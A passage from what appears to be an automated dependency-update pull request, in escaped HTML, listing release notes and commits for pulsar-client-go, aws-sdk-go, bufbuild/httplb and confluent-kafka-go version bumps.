href=\"https://github.com/gy-deng\"\u003e\u003ccode\u003e@​gy-deng\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1410\"\u003e#1410\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coderzc\"\u003e\u003ccode\u003e@​coderzc\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1435\"\u003e#1435\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.17.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/apache/pulsar-client-go/blob/master/CHANGELOG.md\"\u003egithub.com/apache/pulsar-client-go's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch1\u003ePulsar-client-go Changelog\u003c/h1\u003e\n\u003cp\u003eAll notable changes to this project will be documented in this file.\u003c/p\u003e\n\u003cp\u003e[0.19.0] 2026-04-07\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[fix] Add JSON tag for \u003ccode\u003eUpdateAuthData\u003c/code\u003e in \u003ccode\u003eUpdateOptions\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1450\"\u003e#1450\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Add \u003ccode\u003eRemovePersistence\u003c/code\u003e methods to namespace admin (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1447\"\u003e#1447\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[improve] Add support for PIP-431: creation and last publish timestamps (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1451\"\u003e#1451\u003c/a\u003e) by \u003ca href=\"https://github.com/codelipenghui\"\u003e\u003ccode\u003e@​codelipenghui\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[docs] Update example code and add log initialization configurations (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1449\"\u003e#1449\u003c/a\u003e) by \u003ca href=\"https://github.com/geniusjoe\"\u003e\u003ccode\u003e@​geniusjoe\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[docs] Update release process to link release and release notes to the Pulsar website (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1453\"\u003e#1453\u003c/a\u003e) by \u003ca href=\"https://github.com/RobertIndie\"\u003e\u003ccode\u003e@​RobertIndie\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[improve] Change producer reconnect error logs to warn logs (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1445\"\u003e#1445\u003c/a\u003e) by \u003ca href=\"https://github.com/RobertIndie\"\u003e\u003ccode\u003e@​RobertIndie\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Implement \u003ccode\u003eReconsumeLater\u003c/code\u003e on regex consumer (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1456\"\u003e#1456\u003c/a\u003e) by \u003ca href=\"https://github.com/jordanfitz\"\u003e\u003ccode\u003e@​jordanfitz\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Add support for issuer URL override in client credentials flow (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1463\"\u003e#1463\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Add removal methods for namespace policies (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1465\"\u003e#1465\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Add support for retrieving schema compatibility strategy with options (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1469\"\u003e#1469\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Add remove replication clusters topic API (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1470\"\u003e#1470\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Treat \u003ccode\u003eProducerBlockedQuotaExceededException\u003c/code\u003e as retryable and continue reconnecting (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1457\"\u003e#1457\u003c/a\u003e) by \u003ca href=\"https://github.com/geniusjoe\"\u003e\u003ccode\u003e@​geniusjoe\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] Fix panic when messages size is 0 (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1460\"\u003e#1460\u003c/a\u003e) by \u003ca href=\"https://github.com/unJASON\"\u003e\u003ccode\u003e@​unJASON\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[improve] Make service URL parsing compatible with Go 1.26 (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1468\"\u003e#1468\u003c/a\u003e) by \u003ca href=\"https://github.com/nodece\"\u003e\u003ccode\u003e@​nodece\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Add scoped topic policies support (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1471\"\u003e#1471\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] Fix consumer not consuming resent chunked messages (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1464\"\u003e#1464\u003c/a\u003e) by \u003ca href=\"https://github.com/geniusjoe\"\u003e\u003ccode\u003e@​geniusjoe\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/codelipenghui\"\u003e\u003ccode\u003e@​codelipenghui\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1451\"\u003e#1451\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jordanfitz\"\u003e\u003ccode\u003e@​jordanfitz\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1456\"\u003e#1456\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/pulsar-client-go/commit/593fccfbd82b80afed335727963b6f5730581491\"\u003e\u003ccode\u003e593fccf\u003c/code\u003e\u003c/a\u003e [Issue 1446][Consumer] Fix consumer can't consume resent chunked messages (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/issues/1\"\u003e#1\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/pulsar-client-go/commit/e7eb92f148f55fbb437d499611f509eb55d72113\"\u003e\u003ccode\u003ee7eb92f\u003c/code\u003e\u003c/a\u003e feat(pulsaradmin): add scoped topic policies support (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/issues/1471\"\u003e#1471\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/pulsar-client-go/commit/d0db3403023d3390392db8562741691482af6df4\"\u003e\u003ccode\u003ed0db340\u003c/code\u003e\u003c/a\u003e improve: service URL parsing compatible with Go 1.26 (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/issues/1468\"\u003e#1468\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/pulsar-client-go/commit/15bd915fcf0af108c533f17dd4fe50f81e1e5a15\"\u003e\u003ccode\u003e15bd915\u003c/code\u003e\u003c/a\u003e fix(consumer): fix panic when messages size is 0 (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/issues/1460\"\u003e#1460\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/pulsar-client-go/commit/d7fafb5a559a1bcd744dff2c3fb2493884621bbd\"\u003e\u003ccode\u003ed7fafb5\u003c/code\u003e\u003c/a\u003e feat: regard ProducerBlockedQuotaExceededException as retryable exception to ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/pulsar-client-go/commit/70d34c965f3961cbd77f517af46d24b706612be6\"\u003e\u003ccode\u003e70d34c9\u003c/code\u003e\u003c/a\u003e admin: add remove replication clusters topic API (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/issues/1470\"\u003e#1470\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/pulsar-client-go/commit/7832a7da85158d86a2bf56f9a6eaf7eebe5bde50\"\u003e\u003ccode\u003e7832a7d\u003c/code\u003e\u003c/a\u003e feat(topic): add support for retrieving applied schema compatibility strategy...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/pulsar-client-go/commit/3564674615ac147075a299aafa8101ccbc2846cf\"\u003e\u003ccode\u003e3564674\u003c/code\u003e\u003c/a\u003e feat(namespace): add removal methods for namespace policies (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/issues/1465\"\u003e#1465\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/pulsar-client-go/commit/203dcf1cd22dbcf853c2a06c52dee3c4e1eba92b\"\u003e\u003ccode\u003e203dcf1\u003c/code\u003e\u003c/a\u003e feat(oauth2): add support for issuer URL override in client credentials flow ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/pulsar-client-go/commit/cc185904de7b42dc97193188874ce6605ff2d560\"\u003e\u003ccode\u003ecc18590\u003c/code\u003e\u003c/a\u003e Implement ReconsumeLater on regex consumer (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/issues/1456\"\u003e#1456\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/apache/pulsar-client-go/compare/v0.14.0...v0.19.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go` from 1.55.6 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.7 (2025-04-22)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/s3/s3manager\u003c/code\u003e: Abort multipart download if object is modified during download\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/4986\"\u003e4986\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/163aada692ed32951f979aacf452ded4c03b8a7c\"\u003e\u003ccode\u003e163aada\u003c/code\u003e\u003c/a\u003e release v1.55.7 (2025-04-22) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/5346\"\u003e#5346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/9eb2bfd2f949fc81b96cee6b5aae6d9b84abea75\"\u003e\u003ccode\u003e9eb2bfd\u003c/code\u003e\u003c/a\u003e Abort multi part download if the object is modified during download\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/8d203ccff393340d080be0417d091cc60354449b\"\u003e\u003ccode\u003e8d203cc\u003c/code\u003e\u003c/a\u003e Update bug-report.yml\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.55.6...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/bufbuild/httplb` from 0.3.1 to 0.4.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/bufbuild/httplb/releases\"\u003egithub.com/bufbuild/httplb's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.4.1\u003c/h2\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMake it safe for users to wrap embedded client's \u003ccode\u003eTransport\u003c/code\u003e with their own middleware by \u003ca href=\"https://github.com/jhump\"\u003e\u003ccode\u003e@​jhump\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/79\"\u003e#79\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix issue where health check loop could prematurely exit due to incorrect context usage by \u003ca href=\"https://github.com/anuraaga\"\u003e\u003ccode\u003e@​anuraaga\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/80\"\u003e#80\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anuraaga\"\u003e\u003ccode\u003e@​anuraaga\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/80\"\u003e#80\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bufbuild/httplb/compare/v0.4.0...v0.4.1\"\u003ehttps://github.com/bufbuild/httplb/compare/v0.4.0...v0.4.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.4.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eEnhancements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd new \u003ccode\u003eWithDisableCompression\u003c/code\u003e configuration by \u003ca href=\"https://github.com/mattrobenolt\"\u003e\u003ccode\u003e@​mattrobenolt\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/71\"\u003e#71\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse faster random number generation by \u003ca href=\"https://github.com/jhump\"\u003e\u003ccode\u003e@​jhump\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/77\"\u003e#77\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBugfixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCorrect usage of timers for library updates in Go 1.23 by \u003ca href=\"https://github.com/glowfall\"\u003e\u003ccode\u003e@​glowfall\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/74\"\u003e#74\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUse standard library support for H2C when building with Go 1.24 by \u003ca href=\"https://github.com/jhump\"\u003e\u003ccode\u003e@​jhump\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/76\"\u003e#76\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mattrobenolt\"\u003e\u003ccode\u003e@​mattrobenolt\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/71\"\u003e#71\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/glowfall\"\u003e\u003ccode\u003e@​glowfall\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/74\"\u003e#74\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bufbuild/httplb/compare/v0.3.1...v0.4.0\"\u003ehttps://github.com/bufbuild/httplb/compare/v0.3.1...v0.4.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/httplb/commit/3d0179892278ea40b46036eb8398d8fe8bd11fcb\"\u003e\u003ccode\u003e3d01798\u003c/code\u003e\u003c/a\u003e Fix health check loop closes on probe timeout (\u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/80\"\u003e#80\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/httplb/commit/1d8b08bf629130667a8e21ee6b67ac651504b0d2\"\u003e\u003ccode\u003e1d8b08b\u003c/code\u003e\u003c/a\u003e Make it safe for users to wrap transport with their own middleware (\u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/79\"\u003e#79\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/httplb/commit/cb2bdba129ed38150522a6efcc0fae81399952b0\"\u003e\u003ccode\u003ecb2bdba\u003c/code\u003e\u003c/a\u003e Add go1.24-specific implementation of \u0026quot;h2c\u0026quot; scheme (\u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/76\"\u003e#76\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/httplb/commit/b069868c025018f85cf3b22f0344290740aa8959\"\u003e\u003ccode\u003eb069868\u003c/code\u003e\u003c/a\u003e Update usage of random number generators (\u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/77\"\u003e#77\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/httplb/commit/48a551d69c59fe25a07ecf939e6fabea0bad52d4\"\u003e\u003ccode\u003e48a551d\u003c/code\u003e\u003c/a\u003e Fix usage of timers for go 1.23 (\u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/74\"\u003e#74\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/httplb/commit/d2dee4797db90d405e6281a9357ad898aa0c2736\"\u003e\u003ccode\u003ed2dee47\u003c/code\u003e\u003c/a\u003e Bump golang.org/x/net from 0.36.0 to 0.38.0 (\u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/75\"\u003e#75\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/httplb/commit/0a208491525e165a6e021b151605ed14a39f301e\"\u003e\u003ccode\u003e0a20849\u003c/code\u003e\u003c/a\u003e Bump golang.org/x/net from 0.33.0 to 0.36.0 (\u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/73\"\u003e#73\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/httplb/commit/503b18adbeb5c1be8b95bd9c548074cbc5d25ab5\"\u003e\u003ccode\u003e503b18a\u003c/code\u003e\u003c/a\u003e Bump golang.org/x/net from 0.23.0 to 0.33.0 (\u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/72\"\u003e#72\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/httplb/commit/023d3e522c53ff63070a8d52b86191ddc8f1c075\"\u003e\u003ccode\u003e023d3e5\u003c/code\u003e\u003c/a\u003e Add new WithDisableCompression configuration (\u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/71\"\u003e#71\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/bufbuild/httplb/compare/v0.3.1...v0.4.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/confluentinc/confluent-kafka-go/v2` from 2.8.0 to 2.14.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/confluentinc/confluent-kafka-go/releases\"\u003egithub.com/confluentinc/confluent-kafka-go/v2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.14.1\u003c/h2\u003e\n\u003cp\u003eThis is a maintenance release:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eBundle prebuilt binaries for linux-s390x (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/5365\"\u003e#5365\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003econfluent-kafka-go is based on librdkafka v2.14.1, see the \u003ca href=\"https://github.com/confluentinc/librdkafka/releases/tag/v2.14.1\"\u003elibrdkafka v2.14.1 release notes\u003c/a\u003e for a complete list of changes, enhancements, fixes and upgrade considerations.\u003c/p\u003e\n\u003ch2\u003ev2.14.0\u003c/h2\u003e\n\u003cp\u003eThis is a feature release:\u003c/p\u003e\n\u003ch3\u003eEnhancements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for Azure User-Assigned Managed Identity (UAMI) authentication in Schema Registry client\u003c/li\u003e\n\u003cli\u003eAdd AssociatedNameStrategy (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1515\"\u003e#1515\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd enableAt to RuleSet (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1530\"\u003e#1530\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDereference map ptrs for data quality rules (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1532\"\u003e#1532\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003econfluent-kafka-go is based on librdkafka v2.14.0, see the\n\u003ca href=\"https://github.com/confluentinc/librdkafka/releases/tag/v2.14.0\"\u003elibrdkafka v2.14.0 release notes\u003c/a\u003e\nfor a complete list of changes, enhancements, fixes and upgrade considerations.\u003c/p\u003e\n\u003ch2\u003ev2.13.3\u003c/h2\u003e\n\u003cp\u003eThis is a maintenance release:\u003c/p\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAllow compatibility with librdkafka 2.13.0+ (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1524\"\u003e#1524\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.13.2\u003c/h2\u003e\n\u003cp\u003eThis is a maintenance release:\u003c/p\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAllow Azure KMS key version to be optional (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1503\"\u003e#1503\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eschemaregistry/rules/encryption: fix dropped errors (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1512\"\u003e#1512\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpdate frozen semantics for associations in mock SR client (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1514\"\u003e#1514\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003econfluent-kafka-go is based on librdkafka v2.13.2, see the\n\u003ca href=\"https://github.com/confluentinc/librdkafka/releases/tag/v2.13.2\"\u003elibrdkafka v2.13.2 release notes\u003c/a\u003e\nfor a complete list of changes, enhancements, fixes and upgrade considerations.\u003c/p\u003e\n\u003ch2\u003ev2.13.0\u003c/h2\u003e\n\u003ch2\u003eEnhancements\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for forwarding librdkafka log events to a Go channel in AdminClient (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1448\"\u003e#1448\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd support for FIPS 140-3 on Schema Registry operations (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1486\"\u003e#1486\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd Schema Registry Associations support with mock client implementation (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1485\"\u003e#1485\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd associations example (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1498\"\u003e#1498\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eHandle evolution during field transformation (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1490\"\u003e#1490\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd Accept-Version header to Schema Registry requests (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1487\"\u003e#1487\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixes\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... 